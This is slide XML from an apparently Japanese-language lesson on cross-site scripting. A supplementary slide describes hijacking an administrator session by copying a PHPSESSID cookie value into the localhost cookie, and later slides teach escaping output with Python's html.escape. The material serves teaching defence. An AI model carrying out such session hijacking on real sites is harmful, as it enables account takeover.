              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の中の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>から</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PHPSESSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の値に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>GoogleChrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で表示した</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PHPSESSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の値をコピーして入れる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="図 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A948313-03D7-7EB5-07E3-B2616996DC2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="48059" t="36019"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657599" y="3133600"/>
            <a:ext cx="4094923" cy="1158200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B560461-A61F-87A8-3E1E-B024BF853684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4291800"/>
            <a:ext cx="10515600" cy="2203063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="正方形/長方形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAF6FD1-5381-C51E-53E0-5A522F94C7CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4420925" y="3530379"/>
            <a:ext cx="1675075" cy="174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CA5D0E45-0B9C-9A73-5FFB-D0B34714FB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4651513" y="3705308"/>
            <a:ext cx="606950" cy="1884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741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E67EB5-F18A-DF69-2D9D-ABF54CD3B6F5}"/>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B55D6CDC-01B5-3CF8-37DB-595FF5AADE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>更新すると管理者のセッションでアクセスされる。</a:t>
            </a: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8CF3E847-573E-6EA8-E76D-8CA4975998E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3148081"/>
            <a:ext cx="5336827" cy="1706425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019AA8F5-F83C-F5FB-9998-FFBFB375F8CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="759173" y="3189260"/>
            <a:ext cx="5031916" cy="1777200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矢印: 右 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F543BA-95E6-38D8-C988-EB8684EC4E66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5280152" y="3940742"/>
            <a:ext cx="954157" cy="102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更新</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2953530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C45EA-130A-3335-E9F1-E8EAE27CDE71}"/>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70253614-236C-EFF6-206A-59C27EC45A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグに使う文字「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」をブラウザ上で表示できるように文字を変換する。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>そこで用いるものが</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>だと</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>tml.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文字列</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>となる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3224305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7E1EF-E98F-FFE1-CF5F-C94FAE64952C}"/>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BF000BF0-3587-BAC1-B89B-526DB56BCCE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリのインポート</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>tml</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリをインポート</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="図 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD204033-1398-08CD-436E-ECCAF234DCED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1056913" y="3665552"/>
            <a:ext cx="9924889" cy="2109173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3584FD1-2D8B-25E0-8F6D-A56D170B1723}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319916" y="5486401"/>
            <a:ext cx="1519975" cy="2862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7952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17A896-A995-E7E8-565C-D460417E871D}"/>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71023FD8-BA8B-E570-A9E8-E4C9375C8B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリと掲示板画面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4EEE3F-B154-4731-3910-48B94430FD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2431849" y="2765811"/>
            <a:ext cx="6166162" cy="3806577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="正方形/長方形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC308365-0434-DB89-6433-85D320AE1A1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5714726" y="4601513"/>
            <a:ext cx="1350396" cy="1136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5030FE3-7B76-BC31-0408-684960602741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5856524" y="4738011"/>
            <a:ext cx="1105231" cy="112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0F98C301-C5D4-D737-83BF-E149CBC820F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5255812" y="4900653"/>
            <a:ext cx="3185487" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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外部から入力された文字列や</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データベースからの文字列は</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>必ず</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1638043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982FDD-3440-E7C7-56A1-B9834058ACF9}"/>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214CD0DB-856C-8328-166B-6D4F22EDE8F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99599C5B-7A30-800A-9A02-8D1E0A16A3D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399893" y="2141537"/>
            <a:ext cx="4654398" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91DB514-5902-6569-45DD-303B7500C7F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493910" y="6311900"/>
            <a:ext cx="4654398" cy="180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6BCB59-7FCF-4AFD-3BFC-6D073B83097C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8399145" y="6067095"/>
            <a:ext cx="2954655" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>スクリプトが文字列として</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>表示される</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3595916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C46562-A2BB-756D-2B2B-6367B326CE1C}"/>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528A0DE4-5819-381C-5BAC-220C16F44DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>コード</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E03AF0-9C95-A346-10DE-B57F346BD436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1900361" y="2280714"/>
            <a:ext cx="8391277" cy="3441159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="正方形/長方形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B99F12D-D578-D876-D3F0-9769320D7E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776870" y="5454595"/>
            <a:ext cx="5796500" cy="206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827E033-CA28-924B-8D15-0BFE38E63CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581965" y="5768032"/>
            <a:ext cx="6186309" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグに使われた文字やその他に複数文字が変換されている</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128318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5029E6-A9D3-D1B0-904F-B33DFD01B749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クロスサイトスクリプティング</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBDF27BF-2CC9-5DB4-3A55-D14E3ABDD40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策</a:t>
            </a:r>
            <a:r>
